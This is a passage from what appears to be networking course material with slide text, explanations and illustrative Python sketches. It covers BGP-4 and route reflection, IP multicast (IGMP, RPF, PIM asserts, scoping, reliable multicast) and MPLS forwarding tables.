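    return [p for p in prefixes if p.prefixlen <= max_len]


customer_blocks = [f"198.18.{i}.0/22" for i in range(0, 32, 4)]   # eight /22s
announced = aggregate(customer_blocks)
print(announced)   # [IPv4Network('198.18.0.0/19')]
print(tier1_filter(announced + [IPv4Network("203.0.113.0/24")]))  # the /24 is dropped
```

The eight contiguous /22 blocks survive the filter only because they can be announced as a single /19. An isolated /24 would be invisible beyond such a provider.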
RFC 1174: IAB Recommended Policy on Distributing Internet Identifier
Assignment.
This RFC represents the official view of the Internet Activities Board (IAB), and
describes the recommended policies and procedures on distributing Internet
identifier assignments and dropping the connected status requirement.
RIRs
RIPE NCC (1992)
Africa
LACNIC
Recent assignments
(check IANA website)
The assignment of Class A addresses is controlled by the IANA.
Class B Assignment
IANA and RIRs requirements
Was classful
RFC 1267
BGP-4
Classless
RFC 1771
BGP is a distance vector protocol. This means that it announces to its
neighbors those IP networks that it can reach itself. The receivers of that
information will say: "If that AS can reach those networks, then I can reach them
via it."
If two different paths are available to reach the same IP subnet, then the
shortest path is used. This requires a means of measuring the distance, a metric.
All distance vector protocols have such a means. BGP does this in a very
sophisticated way by using attributes attached to the reachable IP subnet.
BGP sends routing updates to its neighbors using a reliable transport. This
means that the sender of the information always knows that the receiver has
actually received it. So there is no need for periodic updates or routing
information refreshes. Only information that has changed is transmitted.
The reliable information exchange, combined with the batching of routing
updates that BGP also performs, allows BGP to scale to Internet-sized networks.
BGP-4 at a Glance
Carried within TCP
Using attributes
A router that has received reachability information from a BGP peer must be
sure that the peer router is still there. Otherwise, traffic could be routed towards a
next-hop router that is no longer available, causing the IP packets to be lost in a
black hole.
TCP does not signal that the TCP peer is lost unless some
application data is actually transmitted between the peers. In an idle state, where
BGP has no need to update its peer, the peer could disappear without TCP
detecting it.
Therefore, BGP itself detects its neighbors' presence by periodically
sending small BGP keepalive packets to them. TCP treats these packets as
application data and therefore transmits them reliably. According to the BGP
specification, the peer router must also reply with a BGP keepalive
packet.
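The keepalive mechanism can be sketched as a small hold timer in Python. The default hold time of 90 s with keepalives every third of it follows RFC 4271's suggested values; vendor defaults may differ, so treat these numbers as assumptions. `HoldTimer` is a hypothetical class, and the injectable `clock` exists only so the behavior can be tested without waiting.

```python
import time
from typing import Callable, Optional


class HoldTimer:
    """Tracks whether a BGP peer is still alive.

    Any KEEPALIVE or UPDATE from the peer restarts the hold timer; if
    nothing arrives within hold_time seconds the peer is declared down.
    """

    def __init__(self, hold_time: float = 90.0,
                 clock: Callable[[], float] = time.monotonic):
        self.hold_time = hold_time
        self.keepalive_interval = hold_time / 3
        self.clock = clock
        self.last_heard = clock()
        self.last_sent: Optional[float] = None

    def message_received(self) -> None:
        self.last_heard = self.clock()

    def peer_alive(self) -> bool:
        return self.clock() - self.last_heard < self.hold_time

    def keepalive_due(self) -> bool:
        now = self.clock()
        return self.last_sent is None or now - self.last_sent >= self.keepalive_interval

    def keepalive_sent(self) -> None:
        self.last_sent = self.clock()
```

Sending keepalives three times per hold interval means that one or two lost keepalives do not tear down the session.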
Path Vector Protocol
Metric: Number of AS-Hops
All traversed ASs are carried in the
AS-Path attribute
Attributes
Routing Table calculated from BGP
Database
CPU/Memory resources needed
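The path vector idea can be sketched in Python. A route that already lists the local AS in its AS-Path is rejected as a loop. Among the remaining routes, the one with the fewest AS hops wins, and the local AS is prepended when the route is passed on. Real BGP evaluates several other attributes before AS-Path length, so this shows only the metric named on the slide. `Route`, `accept`, `best_paths` and `advertise` are hypothetical names.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Route:
    prefix: str
    as_path: Tuple[int, ...]   # leftmost = most recently traversed AS
    next_hop: str


def accept(route: Route, local_as: int) -> bool:
    """Loop check: reject a route whose AS-Path already contains our AS."""
    return local_as not in route.as_path


def best_paths(routes: List[Route], local_as: int) -> Dict[str, Route]:
    """Keep, per prefix, the loop-free route with the fewest AS hops."""
    best: Dict[str, Route] = {}
    for r in routes:
        if not accept(r, local_as):
            continue
        current = best.get(r.prefix)
        if current is None or len(r.as_path) < len(current.as_path):
            best[r.prefix] = r
    return best


def advertise(route: Route, local_as: int, my_next_hop: str) -> Route:
    """Prepend our own AS before passing the route to an external peer."""
    return Route(route.prefix, (local_as,) + route.as_path, my_next_hop)
```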
The designers of the BGP protocol succeeded in creating a highly scalable
routing protocol, which can forward reachability information between
Autonomous Systems, also known as Routing Domains. They had to consider an
environment with an enormous number of reachable networks and complex
routing policies driven by commercial rather than technical considerations.
TCP, a well-known and widely proven protocol, was chosen as the transport
mechanism. That decision kept the BGP protocol simple, but it put an extra load
on the CPU of the routers running BGP. The point-to-point nature of TCP might
also slightly increase network traffic: any update that should be sent to many
receivers has to be multiplied into several copies, which are then
transmitted on individual TCP sessions to the receivers.
Whenever the designers had to choose between fast convergence and scalability,
scalability was the top priority. The batching of updates and the relatively low
frequency of keepalive packets are examples where convergence time came
second to scalability.
Some Interesting Numbers
Today's Internet BGP Backbone
Routers are burdened
Connectionless nature of IP
Mitigated through
Community attribute
Peer groups
BGP still has some limitations. It is impossible to implement source
address-based policies with BGP (unless supported by vendor-specific
techniques). Furthermore, BGP is still hop-by-hop routing; that is, the
connectionless nature of IP makes it impossible to foresee what the next routers
will do with the route.
Neighborship Establishment
Open Message
AS number
Hold Time
Problems are indicated with Notification
message
[Figure: the BGP routers of AS 1 and AS 2 exchange Open messages; networks Net 11, Net 12, Net 48 and Net 49.]
The BGP protocol is carried in a TCP session, which must be opened from one
router to the other. To do so, the router attempting to open the session
must be configured with the IP address to which it directs its attempts.
NLRI Update
After the Open message, all known routes are
exchanged using Update messages
Contains network layer reachability
information (NLRI)
19 Bytes
IBGP: 200
n(n-1)/2 links
Resource and
configuration
challenge
Solutions:
Route Reflectors
Confederations
Note: These are logical IBGP connections!
The physical topology might look different!
Every BGP router maintains IBGP sessions with all other internal BGP routers of
an AS. Obviously, this fully meshed approach does not scale. In particular, it
becomes a resource and manageability problem if the number of BGP sessions in
one router exceeds 100.
Remember that each BGP session corresponds to a TCP connection, which
requires a lot of system resources. Additionally, BGP sessions must be manually
established, so a fully meshed environment is also a configuration problem. This
is also the reason why BGP cannot replace traditional IGPs in "normal"
autonomous systems. ISPs demand fast BGP convergence and in general do not
need an IGP.
Generally, there are two solutions to circumvent this problem: Route Reflectors
and Confederations. Both techniques are discussed in the next slides.
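The session count behind the full-mesh problem can be checked with a few lines of Python. For the 200 IBGP routers on the slide, n(n-1)/2 gives 200 x 199 / 2 = 19,900 sessions, and each router must hold 199 of them. That is well above the roughly 100 sessions per router named above as the practical limit. The single route reflector figure assumes one RR peering with every other router, without redundancy. Both function names are hypothetical.

```python
def full_mesh_sessions(n: int) -> int:
    """IBGP sessions needed to fully mesh n routers: n(n-1)/2."""
    return n * (n - 1) // 2


def single_rr_sessions(n: int) -> int:
    """Sessions with one route reflector and n - 1 clients (no redundancy)."""
    return n - 1


for n in (10, 50, 200):
    print(f"{n} routers: full mesh {full_mesh_sessions(n)} sessions "
          f"({n - 1} per router), single RR {single_rr_sessions(n)}")
```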
Route Reflector
[Figure: one route reflector (RR) with five clients]
RR mirrors BGP
messages for
"clients"
RR and clients
belong to a
"cluster"
Only RR must be
configured
ORIGINATOR_ID
Contains router-id of the route's originator in the local AS;
attached by RR (Optional, Non-Transitive)
CLUSTER_LIST
Sequence of cluster-ids; RR appends own cluster-id when
route is sent to non-clients outside the cluster
(Optional, Non-Transitive)
It is important to know that RRs preserve IBGP attributes. Even the NEXT_HOP
remains the same; otherwise, routing loops might occur. Imagine two clusters
whose RRs are logically interconnected via IBGP but physically via clients. If
one of these RRs learns about an NLRI from the other RR, it reflects
that information to its clients, including the client that forwarded this NLRI
information to this RR.
Obviously, the NEXT_HOP attribute must remain the same, that is, it must point to the
RR of the other cluster and not to the local RR, because there is no physical
connection between the RRs.
If an RR learns the same NLRI from multiple client peers, only one path will be
propagated to other peers. Therefore, when RRs are used, fewer paths to a given
destination might be available than with a fully meshed
approach. Thus, suboptimal routing can only be avoided if the logical topology
maps the physical topology as closely as possible.
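The loop protection provided by ORIGINATOR_ID and CLUSTER_LIST can be sketched in Python. As a simplification, this sketch adds the cluster ID on every reflection instead of only toward non-clients. It deliberately leaves NEXT_HOP untouched, as described above. `IbgpRoute`, `rr_reflect` and `receiver_accepts` are hypothetical names, and IDs are plain strings for readability.

```python
from dataclasses import dataclass, replace
from typing import Optional, Tuple


@dataclass(frozen=True)
class IbgpRoute:
    prefix: str
    next_hop: str
    originator_id: Optional[str] = None
    cluster_list: Tuple[str, ...] = ()


def rr_reflect(route: IbgpRoute, learned_from: str, cluster_id: str) -> Optional[IbgpRoute]:
    """Prepare a route for reflection; None means it must be dropped."""
    if cluster_id in route.cluster_list:
        return None                      # route has already passed this cluster
    return replace(
        route,
        originator_id=route.originator_id or learned_from,  # set once, then kept
        cluster_list=(cluster_id,) + route.cluster_list,
        # next_hop is intentionally not modified
    )


def receiver_accepts(route: IbgpRoute, my_router_id: str) -> bool:
    """A router ignores routes that it originated itself."""
    return route.originator_id != my_router_id
```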
Redundant RRs
RR
RR
RR is single
point of failure
Best scalability
Confederations drawbacks
No Congestion Avoidance!
Shared Trees
IP Multicast routing was developed in the late 1980s and had a great
impact on QoS research in the Internet. RSVP and RTP serve as helper
protocols for IP Multicast, which is fully UDP based and therefore lacks
congestion avoidance and error recovery.
All multicast methods can be classified by their type of distribution
tree: either "Shortest Path Trees" (SPT) or "Shared Trees". Both
are explained next.
It might be interesting to know that the first notable use of IP multicast was
during the IETF meeting in 1992, where the whole conference (video and
audio) was multicast.
How IP Multicast Works...
Sources don't care at all!
Simply send multicast packets to the first-hop router
First-hop router
Based on tunnels
Connectionless environment
QoS
Only point-to-point!
Client-Server based
Across domains
Group range: 232.0.0.0/8
232.0.0.0 to 232.255.255.255
The increasing demand for interdomain multicast routing led to some interim
solutions such as GLOP. However, GLOP addressing leaves only the last byte to the
individual AS, which results in just 256 group addresses per AS.
When the sources (senders) have to be globally known, a special range of
multicast addresses can be used for those servers. Additionally, the specialized
multicast protocol called "Source Specific Multicast (SSM)" can be used. SSM
supports building the distribution tree at the source for any group
address from the range 232.0.0.1 to 232.255.255.255.
Defined in IETF draft "draft-holbrook-ssm-00.txt".
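Both address schemes can be illustrated with Python's `ipaddress` module. The sketch assumes the GLOP layout 233.X.Y.0/24, where X.Y are the two bytes of a 16-bit AS number. This layout is why each AS gets only one byte, i.e. 256 group addresses. The SSM check uses the 232.0.0.0/8 range from the slide. Function names are hypothetical.

```python
from ipaddress import IPv4Address, IPv4Network

SSM_RANGE = IPv4Network("232.0.0.0/8")


def glop_block(asn: int) -> IPv4Network:
    """GLOP: 233.X.Y.0/24, where X.Y are the two bytes of a 16-bit AS number."""
    if not 0 < asn < 65536:
        raise ValueError("GLOP only covers 16-bit AS numbers")
    return IPv4Network(f"233.{asn >> 8}.{asn & 0xFF}.0/24")


def is_ssm_group(group: str) -> bool:
    """True if the group address lies in the SSM range."""
    return IPv4Address(group) in SSM_RANGE


block = glop_block(5662)
print(block, block.num_addresses)   # 233.22.30.0/24 256
print(is_ssm_group("232.1.2.3"))    # True
```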
Dynamic Multicast Addressing
Method of SDR (Mbone)
Not scalable
Multicast Address Set-Claim (MASC)
Hierarchical concept
Under development
The Session Directory (SDR) is an important application for the Mbone. SDR
detects collisions when creating new sessions and switches to an unused address.
This method was sufficient in the old Mbone, but the increasing number
of sessions has revealed that it does not scale well.
MASC is a new proposal for dynamic multicast address allocation that is
being developed by the Multicast-Address Allocation (malloc) Working Group
of the Internet Engineering Task Force (IETF).
MASC requires domains to lease IP multicast group address space from their
parent domain. These leases are valid only for a set period. The parent domain
may grant a completely different range at lease renewal time,
because address space may need to be reclaimed for use elsewhere in the Internet.
This task is indeed very complex!
MASC is part of the hierarchical Multicast Address Allocation Architecture
(MAAA) and represents the top level of this architecture. When a certain range
of multicast addresses is allocated at the top level, the underlying hierarchies
use additional protocols for address assignment. Within a domain (AS or
service provider), the Address Allocation Protocol (AAP) is used. The
Multicast Address Dynamic Client Allocation Protocol (MADCAP) is
merely a modified DHCP and allows address assignment at leaf segments for
the multicast sources. Servers for address allocation within the MAAA
architecture are called Multicast Address Allocation Servers (MAAS).
See "draft-ietf-malloc-masc-01.txt" for detailed MASC principles.
IGMP
Internet Group Management Protocol
Used (mainly) by hosts
To tell designated routers about desired group membership
Supported by nearly all operating systems
IGMP Version 1
"I want to receive (*, G)"
Silly: Leaving group only by being silent...
Specified in RFC 1112 (old)
IGMP Version 2
Also: "I do not want to receive this any longer"
Specified in RFC 2236 (current)
IGMP Version 3
"I want to receive (S, G)"
DR can directly contact source
Still under development
Hosts use the Internet Group Management Protocol (IGMP) primarily to
tell the DR that they want to receive multicast traffic. Upon receiving
IGMP messages, the DR may retrieve the specified multicast traffic by joining the
MDT.
IGMP is carried directly within IP using protocol number 2.
The initial specification for IGMP (now considered v1) was documented
in RFC 1112 ("Host Extensions for IP Multicasting", August 1989, Stanford
University). Several shortcomings of IGMPv1 were soon discovered (e.g.
hosts leave a group by not responding), which led to the development of
IGMPv2.
To tell the whole truth: IGMP Version 0 had been specified in RFC 988 and
was obsoleted by RFC 1112.
Using IGMPv2, hosts can send a leave message to the router. The router
immediately sends a query to check whether any host still wants to
be a member of this group. If there is no answer within three seconds (!), the
group is pruned from the multicast tree. IGMPv2 was ratified in November
1997 in RFC 2236 ("Internet Group Management Protocol, Version 2" by
Xerox PARC).
IGMPv3 is still under development. Please check out draft-ietf-idmr-igmp-v3-??.txt
...as things change quickly...
IGMP
DR sends Host Membership Queries to 224.0.0.1 every 60 to 120 s
Asking local receivers for all active groups
Interested hosts send IGMP "report"
With destination address = group address !
Countdown-based, TTL=1
Figure: the DR sends a periodic "Host Membership Query" to 224.0.0.1 ("All Hosts"); of the several members of group 224.1.1.1, only one replies with a "report" message.
The basic principle is this:
The designated router periodically sends a "Host Membership Query" to the
destination address 224.0.0.1 ("all hosts"). Note: The TTL is set to 1.
Upon receiving a "Host Membership Query" from the router, each host starts a
countdown for each group it is a member of. The countdown is initialized with a
random value (IGMPv1: between 0 and 10 seconds).
The host whose countdown reaches zero first sends a "Host Membership Report"
message; again the TTL is set to 1. Because the report is sent to the group
address, every other member of this group hears it and can immediately cancel
its countdown without replying. This method saves bandwidth and processing on the hosts.
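The report-suppression rule can be sketched in Python. This is a simplified model, not an IGMP implementation: it assumes one group, a lossless LAN, distinct timer values and the IGMPv1 range of 0 to 10 seconds; the function name `query_round` is hypothetical.

```python
import random


def query_round(members, max_delay_s=10.0, seed=None):
    """Simulate the replies to one Host Membership Query for a single group.

    Every member starts a random countdown in [0, max_delay_s]. The member
    whose countdown expires first sends the report to the group address;
    all other members hear it and cancel their own countdowns.
    Returns (reporter, delay_s, suppressed_members).
    """
    rng = random.Random(seed)
    countdowns = {host: rng.uniform(0.0, max_delay_s) for host in members}
    reporter = min(countdowns, key=countdowns.get)
    suppressed = [host for host in members if host != reporter]
    return reporter, countdowns[reporter], suppressed


reporter, delay, suppressed = query_round(["A", "B", "C", "D"], seed=1)
print(f"{reporter} reports after {delay:.2f} s; suppressed: {suppressed}")
```

However many members the LAN has, in this model the DR receives exactly one report per group and query.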
Using IGMPv1, hosts leave a group simply by not responding. The DR sends
three query messages (one every 60 seconds), and if no host replies, this subnet is
pruned from the multicast tree. This is indeed silly, because for up to 3 minutes the
whole LAN is flooded with unwanted multicast traffic.
Using IGMPv2, hosts can send a leave message to the router. The router
immediately sends a query in order to check if there is really no host wanting to
be a member of this group. If there is no answer within 3 seconds (!) the group is
pruned from the multicast tree.
Note: Join messages can also be sent immediately without being queried by the
DR in advance ("asynchronous joins").
Other Important Differences
IGMPv1
Good question...
IGMP Snooping
Switches must decode IGMP
Provided by RTCP
Determine if outgoing link is on upstream path for the next router
Avoids any duplicates
Figure (labels: 20.0.0.1, 224.0.0.1, "RPF Check failed")
RPF can be enhanced by looking "one step ahead". That is, duplicate
packets can be avoided if packets are only forwarded on links which are
upstream to the next router. This can easily be calculated using a link state
protocol.
Cisco routers perform an RPF check every 5 seconds by default.
A so-called "Outgoing Interface List" (OIL) contains interfaces pointing
to:
Multicast neighbors
Receivers
Administratively pre-configured interfaces
Using the OIL allows a quick decision on which interfaces the packet
should be forwarded. If the OIL is empty, then a "Prune" message is
sent to the upstream router.
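The RPF check and the OIL decision can be combined into one small Python sketch. It is illustrative only. One dictionary stands in for the unicast routing table, with an exact-match lookup replacing longest-prefix matching, and a second stands in for the mroute OIL. The names `handle_multicast`, `rpf_table` and `oil_table` and the interface names are hypothetical.

```python
def handle_multicast(source, group, in_iface, rpf_table, oil_table):
    """Decide what to do with one multicast packet.

    rpf_table: source address -> interface the unicast routing table uses
               to reach that source (the RPF interface).
    oil_table: (source, group) -> set of interfaces in the OIL.
    Returns ("drop", []), ("prune", []) or ("forward", [interfaces]).
    """
    # RPF check: accept the packet only on the interface leading back to the source.
    if rpf_table.get(source) != in_iface:
        return "drop", []
    # Never send the packet back out of the interface it arrived on.
    out = sorted(oil_table.get((source, group), set()) - {in_iface})
    if not out:
        # Empty OIL: nobody downstream wants this traffic, so prune upstream.
        return "prune", []
    return "forward", out


rpf_table = {"20.0.0.1": "Eth0"}
oil_table = {("20.0.0.1", "224.1.1.1"): {"Eth1", "Eth2"}}
print(handle_multicast("20.0.0.1", "224.1.1.1", "Eth0", rpf_table, oil_table))
print(handle_multicast("20.0.0.1", "224.1.1.1", "Eth1", rpf_table, oil_table))
```

The second call models a duplicate arriving on a non-RPF interface: it is dropped instead of being forwarded again.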
Multicast Scoping using TTL
Packet's TTL is decremented by 1 when packet
arrives at incoming interface
Then the packet is forwarded according to the OIL,
which also contains TTL thresholds per interface
In both directions!
When TTL scoping is used together with broadcast-and-prune multicast
protocols, a router that discards multicast packets because of TTL scoping cannot
prune the upstream source anymore. Additionally, TTL-based multicast scoping does not support
overlapping zones.
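A minimal Python sketch of TTL scoping follows. It assumes that a packet leaves an OIL interface only if its TTL, after the decrement on arrival, is still at least that interface's threshold. The exact comparison differs between implementations, and the interface names and the threshold of 16 are made up for illustration.

```python
def ttl_scoped_forward(ttl, oil_thresholds):
    """Apply TTL scoping to one multicast packet.

    ttl: TTL of the packet as received.
    oil_thresholds: OIL interface -> TTL threshold configured on it.
    Returns (new_ttl, sorted list of interfaces the packet is sent on).
    """
    new_ttl = ttl - 1  # decremented when the packet arrives
    out = sorted(
        iface
        for iface, threshold in oil_thresholds.items()
        if new_ttl > 0 and new_ttl >= threshold  # assumed comparison rule
    )
    return new_ttl, out


oil = {"Ethernet0": 1, "Serial0": 16}  # Serial0 acts as a TTL boundary
print(ttl_scoped_forward(16, oil))  # (15, ['Ethernet0'])
print(ttl_scoped_forward(64, oil))  # (63, ['Ethernet0', 'Serial0'])
```

Note that the router still receives the scoped packets before it discards them. This is why such a boundary cannot prune the upstream source.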
Address scoping allows establishing "administrative" multicast boundaries
based on the group address. This method is much more flexible than TTL
scoping. Any multicast packet that is not permitted by the boundary ACL (which
must be specified) is dropped, no matter from which direction the packet came.
Overlapping zones can now be implemented, but they require
different address spaces within those zones. However, this might result in a
complex administration task.
Administrative Boundaries
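Figure (top): 239.1.x.x traffic on both sides of Serial0; Serial0 is an administrative boundary for all 239.1.0.0/16 packets.
Figure (bottom): company network (company-wide groups 239.200.x.x) containing Management (239.195.x.x), Engineering (239.195.x.x) and Marketing (239.196.x.x); boundary ranges shown: 239.192.0.0/10, 239.195.0.0/16, 239.196.0.0/16.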
As shown in the picture at the top, multicast packets for a specified group
address (or range, as ACLs are used) cannot pass this interface in either
direction.
The bottom example shows how three administrative domains can be
multicast-isolated from each other while it is still possible to receive the
company's multicast 239.200.x.x anywhere within its boundaries.
Additionally, it can be seen (look at the management and engineering clouds)
that several zones can use the same address boundaries.
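The boundary decision depends only on the group address. The following Python sketch makes this explicit using the standard `ipaddress` module. The 239.1.0.0/16 range is taken from the Serial0 example; the function name `passes_boundary` is hypothetical, and the list of ranges stands in for the boundary ACL.

```python
import ipaddress

# Ranges denied by the boundary ACL on Serial0 in the example.
SERIAL0_BOUNDARY = [ipaddress.ip_network("239.1.0.0/16")]


def passes_boundary(group, denied_ranges):
    """Return True if packets for `group` may cross the boundary interface.

    The decision uses only the group address, so it is the same for packets
    entering and leaving the interface (no direction parameter is needed).
    """
    addr = ipaddress.ip_address(group)
    return not any(addr in net for net in denied_ranges)


print(passes_boundary("239.1.20.5", SERIAL0_BOUNDARY))   # False
print(passes_boundary("239.200.1.1", SERIAL0_BOUNDARY))  # True
```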
Shared Tree
(*, G) = (*, 224.1.1.1) and (*, 224.2.2.2)
Figure: shared tree rooted at the Rendezvous Point (RP), with hosts 30.0.0.3 and 20.0.0.2 and receivers of groups 224.1.1.1 and 224.2.2.2.
Shared trees utilize a so-called "Rendezvous Point" (RP), which distributes
multicast traffic to its attached receivers. The idea is similar to the
supermarket principle: "Customers should not have to visit every manufacturer
but rather buy everything at the shop around the corner."
In this sense, the RP acts as a supermarket and offers multicast traffic from
several sources. Typically, each RP is a leaf of an SPT, which is rooted at a
source. That is, the shared tree principle is mostly used in combination with an
SPT.
Shared trees consume memory of order O(G) (one (*, G) entry per group, compared
with one (S, G) entry per source and group for source trees), but they might result
in sub-optimal paths from the source to all receivers. Furthermore, they may introduce extra
delay. Thus, only a clever combination of both SPTs and shared trees might be
most efficient. As explained later in this chapter, this led to the development
of "PIM-SM".
Multicast Routing Protocols
By now, the student should have noticed that multicast-enabled routers
maintain so-called (S, G) and (*, G) entries in their mroute table.
(S, G) entries: For this particular source S sending to this particular group G,
traffic is forwarded via the shortest path from the source.
(*, G) entries: For any (*) source sending to this group G, traffic is forwarded
via a meeting point for this group.
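The following Python sketch shows how the two entry types can coexist in one mroute table. The table is a dictionary keyed by (S, G), with "*" as the wildcard source. Preferring a specific (S, G) entry over the (*, G) entry is an assumption of this sketch, although it matches common router behavior. The entry values are placeholder strings.

```python
def mroute_lookup(mroute_table, source, group):
    """Return the entry used for a packet from `source` to `group`, or None.

    A specific (S, G) entry wins; otherwise the group's (*, G) entry is used.
    """
    entry = mroute_table.get((source, group))
    if entry is None:
        entry = mroute_table.get(("*", group))
    return entry


mroute_table = {
    ("*", "224.1.1.1"): "shared tree via RP",
    ("30.0.0.3", "224.1.1.1"): "shortest path tree from 30.0.0.3",
}
print(mroute_lookup(mroute_table, "30.0.0.3", "224.1.1.1"))  # shortest path tree from 30.0.0.3
print(mroute_lookup(mroute_table, "20.0.0.2", "224.1.1.1"))  # shared tree via RP
```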
Multicast Protocol Types
Dense Mode: Push method
Infinity = 32 hops
Creates Truncated Broadcast Trees (TBTs)
To compare administrative distance and metric to source
If assert values are equal, the highest IP address wins
Packets are received on multi-access oilist interfaces
Figure: two routers on a multi-access segment exchange "Assert 120:3" and "Assert 120:2". The router that sent 120:3 answers "Okay, you won! I will prune my interface..."; the other answers "Sweet! I will serve this LAN segment..."
The PIM assert mechanism is used to eliminate duplicate flows on the same
multi-access segment. Unlike DVMRP (which establishes a TBT in
advance using a dedicated multicast routing protocol), the assert mechanism is
only performed when duplicate packets appear on this link.
When a router receives an (S, G) packet via a multi-access interface which is
listed in the (S, G) oilist, it sends an assert message, telling the other
router its so-called assert value.
The assert value contains both the administrative distance of this router and
the metric toward the source; the administrative distance forms the
high-order part of this assert value. The other router also sends an
assert message.
Now both routers compare these values to determine who has the best path (i.e.
lowest value) to the source. If both values are the same, the highest IP
address is used as tiebreaker. Losing routers prune their interface, whereas the
winning router continues to forward multicast traffic onto the LAN segment.
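The assert comparison can be expressed as a sort key in Python. This sketch assumes that an assert value such as "120:3" means administrative distance 120 and metric 3, as described above. The function name and the router addresses are hypothetical.

```python
import ipaddress


def assert_winner(asserts):
    """Return the IP address of the router that keeps forwarding on the LAN.

    asserts: list of (router_ip, admin_distance, metric) tuples.
    The lowest (admin_distance, metric) wins; on a tie the highest IP wins.
    """
    def rank(entry):
        ip, distance, metric = entry
        # Ascending by assert value, then descending by IP address.
        return (distance, metric, -int(ipaddress.ip_address(ip)))

    return min(asserts, key=rank)[0]


print(assert_winner([("10.0.0.1", 120, 3), ("10.0.0.2", 120, 2)]))  # 10.0.0.2
print(assert_winner([("10.0.0.1", 120, 2), ("10.0.0.9", 120, 2)]))  # 10.0.0.9
```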
PIM-SM
Protocol Independent
Or IGMPv3 lite
Border routers
Other AS's RP
If MSDP peer is an RP and has a (*, G) entry
Sequence
Reliable multicast requires UDP-based
acknowledgements
TCP cannot do multicast by nature (too much overhead,
state variables, buffers, timers, ...)
Security issues for financial data delivery etc.!!!
Best effort delivery results in occasional packet drops. Many real-time
multicast applications such as video and audio streaming may be affected by
these losses. On the other hand, it is clearly pointless to request retransmission of
every lost packet.
However, some compression algorithms may be severely affected by even low
drop rates; this causes the picture to become jerky or to freeze for several
seconds while the decompression algorithm recovers.
Duplicate packets may occasionally be generated as multicast network
topologies change.
Reliable Multicast (2)
Guaranteed data delivery is provided by
reliable multicast protocols
Still UDP based of course
Repair cycles
Scalable Reliable Multicast (SRM)
Unicast
ACKs could be sent but are typically
turned off to reduce traffic
Unknown members
No registration expected
MFTP allows the multicast service provider to define three different types of
groups.
All members of a closed group must be known by the source. This model
allows for dedicated authorization and is typically applied only for a small
number of receivers. Here the source specifies the receivers within the
announcement.
Members of an open limited group are not specified by the announcement.
Any receiver may join but must register with the source. The number
of receivers is typically limited.
Members of an unlimited group do not need to register, and the source does not
even send announcements. There is no limit on group size.
SRM
For whiteboarding (wb) in Mbone and general
data distribution
Independent of layer 3
To conform to MTU
FEC
Routing
Forwarding
In other words: The "IP Routing Paradigm"
Hop-by-hop routing (slow)
Destination based routing (large routing tables)
Least cost routing (no load balancing)
ATM: Layer 2 and 3 topologies often
different (hub & spoke)
Manual VC establishment necessary
TE?
QoS?
VPN?
Transport?
Figure: ATM switch and IP router
Destination-based least-cost IP routing does not support load balancing.
Although policy-based routing is supported by most vendors, this solution does
not scale. Also, there are no satisfying solutions available for Traffic
Engineering (TE) and Quality of Service (QoS). Indeed there are some working
IP VPN solutions (e.g. IPsec based), but scalability is still an issue.
MPLS Idea
MPLS is a provider technology
Application: Transport network!
Inside versus border versus outside domains:
Core routers
Provider Edge routers (PE-routers)
MPLS TE (tunnel/destination)
MPLS is basically a software solution. With Cisco IOS version 12.0, routers
are able to perform CEF switching (explained in detail soon), which is the
basis for MPLS. That is, nearly any Cisco router (except the smallest home
office devices) is able to do MPLS.
MPLS routers are also called "Label Switch Routers" (LSRs) and must be
able to perform the following basic operations: insert (or "impose") a label
(this is essential for edge routers), remove (or "pop") a label (this is essential
for last-hop routers), and swap labels (this is always done during packet
forwarding).
There are several reasons for a label stack. For example, with MPLS VPNs, the top
label identifies the egress router while a second label identifies the VPN itself.
Thus the egress router can (as soon as the packet has arrived) pop the outermost
label and forward the packet to the right interface according to the inner label.
Another example is MPLS Traffic Engineering (TE), where the outer label
points to the TE tunnel endpoint and the inner label to the final destination
itself.
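The three LSR operations and the two-label VPN example can be modeled with a Python list used as a stack. This is a data-structure sketch only. The class name, the label values and the destination address are made up, and neither real label encoding nor penultimate-hop behavior is modeled.

```python
class LabeledPacket:
    """An IP packet with an MPLS label stack; the top label is the last element."""

    def __init__(self, payload):
        self.payload = payload
        self.labels = []

    def impose(self, label):
        """Push a label (typically done by the ingress edge router)."""
        self.labels.append(label)

    def swap(self, label):
        """Replace only the top label (done at every forwarding hop)."""
        self.labels[-1] = label

    def pop(self):
        """Remove and return the top label (last hop / egress)."""
        return self.labels.pop()


pkt = LabeledPacket("IP packet to 10.1.1.1")
pkt.impose(33)              # inner label: identifies the VPN
pkt.impose(17)              # outer label: identifies the egress router
pkt.swap(25)                # a core LSR swaps the outer label only
outer = pkt.pop()           # the egress router pops the outer label ...
vpn_label = pkt.labels[-1]  # ... and selects the interface by the inner label
print(outer, vpn_label)     # 25 33
```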
Important Concepts
LDP (RFC) or TDP (Cisco)
CEF is required (Cisco patent)
Routing table is 256-way "mtrie"
Better than Fast Switching: Also 1st packet fast!
DCEF = per interface
MPLS applications only differ in the usage of the control plane
VPN, TE, QoS, ...
All use data plane equivalently
Figure: control plane: the IGP (OSPF, IS-IS, RIPv2, ...) builds the IP routing table; the LIB collects all LDP or TDP information. Data plane (forwarding plane): the FIB forwards IP packets; the LFIB (Label-IN, Label-OUT, L2 information) holds the best label according to the routing metric.
MPLS needs different types of tables which interact to provide MPLS
forwarding functionality.
The IP routing table is a common routing table which is built by the
IGP in use.
The FIB table is derived from the information held in the routing
table plus all necessary layer 2 information and label information
needed for packet forwarding. All incoming IP packets are forwarded
according to the information kept in the FIB table.
The LIB table holds all the corresponding label-to-IP-destination
relationships. The LIB is built using either LDP or TDP updates. Both
protocols distribute label-to-IP-prefix bindings. The LIB is a database
of all possible labels.
The LFIB only holds the best labels out of the LIB and is actually
used to forward MPLS packets. Which labels in the LIB are the best is
determined by the next-hop information supplied by the local IGP.
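The relationship between LIB, routing table and LFIB can be sketched in Python. Of all bindings the neighbors advertised for a prefix, only the one learned from the IGP next hop ends up in the LFIB. The data layout, the function name `build_lfib`, the neighbor names and the label values are hypothetical.

```python
def build_lfib(local_labels, lib, routing_table):
    """Derive the LFIB from the LIB and the IGP next hops.

    local_labels:  prefix -> label this LSR advertised (incoming label)
    lib:           prefix -> {neighbor: label advertised by that neighbor}
    routing_table: prefix -> IGP next hop (one of the neighbors)
    Returns in_label -> (out_label, next_hop).
    """
    lfib = {}
    for prefix, in_label in local_labels.items():
        next_hop = routing_table.get(prefix)
        out_label = lib.get(prefix, {}).get(next_hop)
        if out_label is not None:
            # Only the binding from the IGP next hop is the "best" label;
            # the other bindings stay in the LIB.
            lfib[in_label] = (out_label, next_hop)
    return lfib


local_labels = {"10.0.0.0/8": 21}
lib = {"10.0.0.0/8": {"R2": 35, "R3": 47}}
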